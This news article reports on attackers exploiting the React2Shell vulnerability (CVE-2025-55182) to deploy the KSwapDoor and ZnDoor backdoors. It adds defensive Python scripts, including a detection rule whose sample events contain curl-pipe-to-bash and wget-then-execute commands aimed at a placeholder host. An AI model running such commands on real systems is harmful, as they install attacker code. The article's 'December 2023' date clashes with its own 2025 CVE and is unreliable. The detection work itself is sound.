A significant security vulnerability known as React2Shell is currently being exploited by cybercriminals to deploy various malware strains, including KSwapDoor and ZnDoor, as reported by Palo Alto Networks’ Unit 42 and NTT Security. The exploitation of this vulnerability poses urgent risks to organizations, particularly those leveraging React and Next.js frameworks.
According to Justin Moore, senior manager of threat intelligence research at Palo Alto Networks, KSwapDoor is a sophisticated remote access tool engineered for stealth. This malware creates an internal mesh network that allows compromised servers to communicate seamlessly with each other, evading detection by standard security measures. Notably, KSwapDoor employs strong encryption for secure communications and possesses a ‘sleeper’ mode, enabling attackers to activate the malware using hidden signals. This feature allows the malware to bypass firewalls effectively.
Moore further indicated that KSwapDoor has been observed in two distinct geographies and industries, suggesting the involvement of Chinese state-sponsored actors. The malware’s design and its codebase exhibit connections to known threats from the region, underscoring a sophisticated targeting approach that is generally reserved for high-value objectives.
The cybersecurity community had initially misidentified KSwapDoor as BPFDoor because of its use of raw socket sniffing, a technique that lets it monitor network traffic without exposing any open ports. While BPFDoor is characteristically built around a packet sniffing socket that reacts to specific traffic signatures, KSwapDoor uses this technique as a secondary access point rather than as its primary capability. Moore explained that KSwapDoor's main functionality, a sophisticated peer-to-peer routing system, enables complex lateral movement within a network, which distinguishes it significantly from BPFDoor.
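A raw packet socket shows up in neither a port scan nor `ss -ltn`, which is why the sniffing technique described above is hard to spot from the network side. On the host it does leave a trace: every AF_PACKET socket is listed in `/proc/net/packet`, and its inode can be tied back to the owning process through `/proc/<pid>/fd`. The following is an added defender-side check written for this article, not code from Unit 42 or from the report; the `/proc/net/packet` sample and the fd table are constructed so the parsing logic runs offline, and the column layout is assumed to match the kernel's `af_packet` seq_show output.

```python
"""Find processes holding AF_PACKET raw sockets on Linux (added example)."""
import os
import re
from typing import Dict, List

SOCK_RAW = 3        # value of the Type column for SOCK_RAW packet sockets
ETH_P_ALL = 0x0003  # value of the Proto column when every frame is captured

# Constructed sample of /proc/net/packet; the socket addresses and inodes
# are made up, the column order is the kernel's.
SAMPLE_PROC_NET_PACKET = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff8a0b9e5b5000 3      3    0003   2     1 0      0      32547
ffff8a0b9e5b6000 2      2    0800   0     0 0      0      32613
"""


def parse_proc_net_packet(text: str) -> List[Dict[str, int]]:
    """Return one dict per packet socket with its type, proto, iface and inode."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the header
        parts = line.split()
        if len(parts) < 9:
            continue
        rows.append({
            "type": int(parts[2]),
            "proto": int(parts[3], 16),  # Proto is printed in hex
            "iface": int(parts[4]),
            "inode": int(parts[8]),
        })
    return rows


def suspicious_inodes(rows: List[Dict[str, int]]) -> List[int]:
    """A SOCK_RAW socket bound to ETH_P_ALL sees every frame on the
    interface, which is exactly what a trigger-packet backdoor needs."""
    return [r["inode"] for r in rows
            if r["type"] == SOCK_RAW and r["proto"] == ETH_P_ALL]


def map_inodes_to_pids(inodes: List[int],
                       fd_table: Dict[int, List[str]]) -> Dict[int, List[int]]:
    """fd_table maps pid -> readlink() targets of /proc/<pid>/fd/*, such as
    'socket:[32547]'.  Returns inode -> list of pids holding that socket."""
    wanted = set(inodes)
    hits: Dict[int, List[int]] = {i: [] for i in wanted}
    sock_re = re.compile(r"^socket:\[(\d+)\]$")
    for pid, targets in fd_table.items():
        for target in targets:
            m = sock_re.match(target)
            if m and int(m.group(1)) in wanted:
                hits[int(m.group(1))].append(pid)
    return hits


def read_live_fd_table() -> Dict[int, List[str]]:
    """Walk /proc on a live host; other users' fds are only visible as root."""
    table: Dict[int, List[str]] = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        fd_dir = f"/proc/{name}/fd"
        links = []
        try:
            for fd in os.listdir(fd_dir):
                try:
                    links.append(os.readlink(os.path.join(fd_dir, fd)))
                except OSError:
                    continue  # fd closed between listdir and readlink
        except OSError:
            continue  # process exited or permission denied
        table[int(name)] = links
    return table


if __name__ == "__main__":
    with open("/proc/net/packet") as f:
        live_rows = parse_proc_net_packet(f.read())
    owners = map_inodes_to_pids(suspicious_inodes(live_rows), read_live_fd_table())
    for inode, pids in owners.items():
        print(f"raw ETH_P_ALL socket inode {inode} held by pids "
              f"{pids if pids else 'unknown (run as root)'}")
```

Legitimate tools (tcpdump, DHCP clients, some monitoring agents) also open ETH_P_ALL sockets, so the output is a triage list rather than an alert: the signal is an unexpected process, for instance one whose binary lives in a temporary directory or whose parent is the web application server, holding such a socket while listening on no port.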
In Japan, NTT Security has reported that organizations are facing cyber attacks utilizing React2Shell to introduce ZnDoor malware, which has been detected since December 2023. The attack sequences typically involve running a bash command to retrieve malicious payloads from a remote server and executing them, significantly compromising targeted environments.
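The "fetch a payload with a shell command, then execute it" sequence is a good candidate for a process-creation detection: a Next.js server has no routine reason to spawn a shell that pulls a file from the internet. The rule below is an added example written for this article, not NTT Security's detection content; the event shape (pid, comm, parent comm, command line) is an assumption standing in for auditd execve records or EDR telemetry, and the sample events and the 192.0.2.0/24 addresses in them are constructed.

```python
"""Flag web-server-spawned download-and-execute shell commands (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Process names of the application server that should never be the parent
# of a shell fetching remote content (assumed names for a Next.js deployment).
WEB_PARENTS = {"node", "next-server", "next"}
SHELLS = {"sh", "bash", "dash"}

FETCHER = re.compile(r"\b(curl|wget)\b")
# "curl ... | bash": payload streamed straight into an interpreter
PIPED_TO_SHELL = re.compile(r"\|\s*(ba|da)?sh\b")
# "wget -O /tmp/x ...; chmod +x /tmp/x; /tmp/x": saved, then run
CHAINED_EXEC = re.compile(r"[;&]+\s*(chmod\b|\./|/tmp/|(ba|da)?sh\b)")

# Constructed process-start events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4101", "comm": "sh", "parent_comm": "node",
     "cmdline": "sh -c curl -fsSL http://192.0.2.10/x.sh | bash"},
    {"pid": "4102", "comm": "sh", "parent_comm": "node",
     "cmdline": "sh -c wget -q http://192.0.2.10/zn -O /tmp/zn; chmod +x /tmp/zn; /tmp/zn"},
    {"pid": "4103", "comm": "sh", "parent_comm": "cron",
     "cmdline": "sh -c curl -s https://updates.example.test/manifest.json -o /var/lib/app/m.json"},
    {"pid": "4104", "comm": "sh", "parent_comm": "node",
     "cmdline": "sh -c ls -la /app"},
    {"pid": "4105", "comm": "bash", "parent_comm": "node",
     "cmdline": "bash -c curl -s http://192.0.2.10/conf -o /tmp/conf"},
]


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event matches the rule, else None."""
    if event["comm"] not in SHELLS:
        return None
    if event["parent_comm"] not in WEB_PARENTS:
        return None
    cmd = event["cmdline"]
    if not FETCHER.search(cmd):
        return None
    if PIPED_TO_SHELL.search(cmd):
        return "remote content piped directly into a shell"
    if CHAINED_EXEC.search(cmd):
        return "remote file downloaded and then executed"
    # A bare fetch from the web server's shell is still unusual; lower severity.
    return "network fetch from a web-server-spawned shell"


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run the rule over a batch of events; returns (pid, reason) pairs."""
    findings = []
    for ev in events:
        reason = classify(ev)
        if reason is not None:
            findings.append((ev["pid"], reason))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The parent-process condition does most of the work: the same command line from cron or a deploy pipeline is routine, from the request-handling server it is not. In a real deployment the parent name would be whatever the process manager or container runtime reports for the Next.js server, and the rule would be paired with a network egress alert for the same process tree.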
ZnDoor functions as a remote access trojan, allowing attackers to issue commands remotely. Among the commands executed through ZnDoor are system information retrieval, file operations, and command execution. This operability raises serious concerns about data integrity and system security for the affected organizations.
The recent disclosure aligns with the active exploitation of the vulnerability tracked as CVE-2025-55182, which has received a maximum CVSS score of 10.0. There is mounting evidence from Google that at least five groups with connections to China are actively abusing this vulnerability to distribute a range of malicious payloads, including advanced backdoors and data exfiltration tools.
Microsoft reported that attackers are leveraging this flaw for arbitrary command execution, establishing reverse shells, and deploying remote monitoring tools to gain unauthorized access and manipulate cloud resources. Specifically, these cybercriminals are targeting environments across major cloud platforms, from Azure to AWS, in a bid to harvest sensitive identity tokens and establish persistent access to victim systems.
Ongoing monitoring of the React2Shell vulnerability indicates that over 111,000 IP addresses are potentially at risk, with the highest concentrations found in the United States, Germany, France, and India. The current landscape calls for heightened vigilance and proactive defenses against these advancing threats, particularly for businesses integrating modern development frameworks.
As this situation develops, organizations must remain alert to the tactics and techniques highlighted in the MITRE ATT&CK framework that are likely being employed by these threat actors. Initial access via exploited vulnerabilities, persistence mechanisms utilizing backdoors, and lateral movement through sophisticated network architectures are just some of the strategies that underscore the evolving nature of these cyber threats.